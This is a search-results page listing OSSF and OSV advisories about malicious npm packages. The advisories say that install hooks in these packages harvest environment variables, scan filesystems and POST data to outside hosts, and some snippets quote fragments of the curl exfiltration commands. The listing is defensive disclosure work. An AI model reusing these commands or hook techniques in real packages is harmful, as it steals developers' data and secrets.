Lucene search
K

6035 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 4 days ago5 views

Malicious code in lc-chatbot (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 81ca324fdc9c4ba5536abcd43972f1a506f4af99ace29447b66a17947b1b8606 package.json declares both preinstall and postinstall scripts that run node callback.js, so the callback fires automatically on npm install with no...

5.8AI score
Exploits0References1
OSV
OSV
added 4 days ago4 views

MAL-2026-6559 Malicious code in lc-chatbot (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 81ca324fdc9c4ba5536abcd43972f1a506f4af99ace29447b66a17947b1b8606 package.json declares both preinstall and postinstall scripts that run node callback.js, so the callback fires automatically on npm install with no...

5.8AI score
Exploits0References1
OSV
OSV
added 6 days ago5 views

MAL-2026-6513 Malicious code in dtxto1ols (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 926fc822a2a507fafa6d2e1bb02a9b2bada7d89d3042bd3f0cac0ba2fd7c1991 package.json declares a postinstall script that runs automatically on npm install. The script performs filesystem reconnaissance find / -type f...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 6 days ago10 views

Malicious code in dtxto1ols (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 926fc822a2a507fafa6d2e1bb02a9b2bada7d89d3042bd3f0cac0ba2fd7c1991 package.json declares a postinstall script that runs automatically on npm install. The script performs filesystem reconnaissance find / -type f...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 6 days ago6 views

Malicious code in dtxtools (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector de085e4b6d38025a5a0b959b19b1022deaa7525b427e66679b58b6892328297a package.json declares a postinstall lifecycle script that auto-executes on npm install. The hook performs a recursive filesystem search for database...

5.9AI score
Exploits0References2
OSV
OSV
added 6 days ago4 views

MAL-2026-6514 Malicious code in dtxtools (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector de085e4b6d38025a5a0b959b19b1022deaa7525b427e66679b58b6892328297a package.json declares a postinstall lifecycle script that auto-executes on npm install. The hook performs a recursive filesystem search for database...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added last week7 views

Malicious code in @vpms/design-system (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 43ce5813fba2660b094a3e8a5c5a0bf2f1972530c294830c0a2e3d15dcd1b096 package.json declares preinstall="node index.js". On every npm install, index.js iterates process.env and harvests any variable whose name contains...

5.8AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added last week7 views

Malicious code in gx-npm-feature-flags (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7fcad1b944d9ceb92389673398df9f471911a788fe608774a3298c69900bb1c7 [email protected] is a dependency-confusion squat max-semver 99.99.99 on a gx--prefixed name to outrank a private internal package that...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:51 a.m.10 views

Malicious code in dttsdee (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-25.log"...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:11 a.m.7 views

Malicious code in easy-string-kit232 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9c3f74b6873c47dc8f3a6d6922e9d66d17cafe47b7a80447f45bfe0d1535a6b5 package.json declares a postinstall lifecycle script that auto-executes on npm install and runs curl -X POST -d "$ls -la /data/logs/"...

6AI score
Exploits0References1
OSV
OSV
added 2026/06/25 10:11 a.m.6 views

MAL-2026-6461 Malicious code in easy-string-kit232 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9c3f74b6873c47dc8f3a6d6922e9d66d17cafe47b7a80447f45bfe0d1535a6b5 package.json declares a postinstall lifecycle script that auto-executes on npm install and runs curl -X POST -d "$ls -la /data/logs/"...

6AI score
Exploits0References1
OSV
OSV
added 2026/06/25 10:5 a.m.3 views

MAL-2026-6460 Malicious code in dddooo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-16.log"...

6AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:5 a.m.8 views

Malicious code in dddooo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-16.log"...

6AI score
Exploits0References3
OSV
OSV
added 2026/06/25 8:39 a.m.8 views

MAL-2026-6459 Malicious code in easy-string-kit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8cb77d96cfd133340395df1765df2426f8414d80158e62ee5832ab6d4a18e803 package.json declares a postinstall lifecycle script that automatically runs on npm install and executes roughly 25 curl POST requests harvesting...

6AI score
Exploits0References8
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 8:39 a.m.5 views

Malicious code in easy-string-kit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8cb77d96cfd133340395df1765df2426f8414d80158e62ee5832ab6d4a18e803 package.json declares a postinstall lifecycle script that automatically runs on npm install and executes roughly 25 curl POST requests harvesting...

6AI score
Exploits0References8
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/21 5:40 p.m.9 views

Malicious code in fork-angular-daterangepicker (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d81ecc9a5b511f1d867597c3834e62c3c174209ba7718db45bf27af5d862d90f package.json declares a preinstall lifecycle hook "preinstall": "node index.js" that runs index.js on every npm install. index.js line 3 hardcodes...

5.8AI score
Exploits0References3
OSV
OSV
added 2026/06/21 5:40 p.m.8 views

MAL-2026-6255 Malicious code in fork-angular-daterangepicker (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d81ecc9a5b511f1d867597c3834e62c3c174209ba7718db45bf27af5d862d90f package.json declares a preinstall lifecycle hook "preinstall": "node index.js" that runs index.js on every npm install. index.js line 3 hardcodes...

5.8AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/21 4:21 p.m.11 views

Malicious code in blinkit-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2ca70b0a6be36daf245deb50dd6b3595a9bfba29c62770e82365152a02832cf8 On npm install, the package's preinstall lifecycle hook runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/ and POSTs the installer...

6AI score
Exploits0References1
OSV
OSV
added 2026/06/21 4:21 p.m.10 views

MAL-2026-6250 Malicious code in hyperpure-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 47dd43b980c7b5e3230ee57e6974d40804e54997ed88877ced301402dbcdef4c Package impersonates a Zomato internal namespace name hyperpure-core, repository URL pointing to github.com/zomato/hyperpure-core while shipping a...

6AI score
Exploits0References1
OSV
OSV
added 2026/06/21 4:21 p.m.10 views

MAL-2026-6249 Malicious code in blinkit-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2ca70b0a6be36daf245deb50dd6b3595a9bfba29c62770e82365152a02832cf8 On npm install, the package's preinstall lifecycle hook runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/ and POSTs the installer...

6AI score
Exploits0References1
Rows per page
Query Builder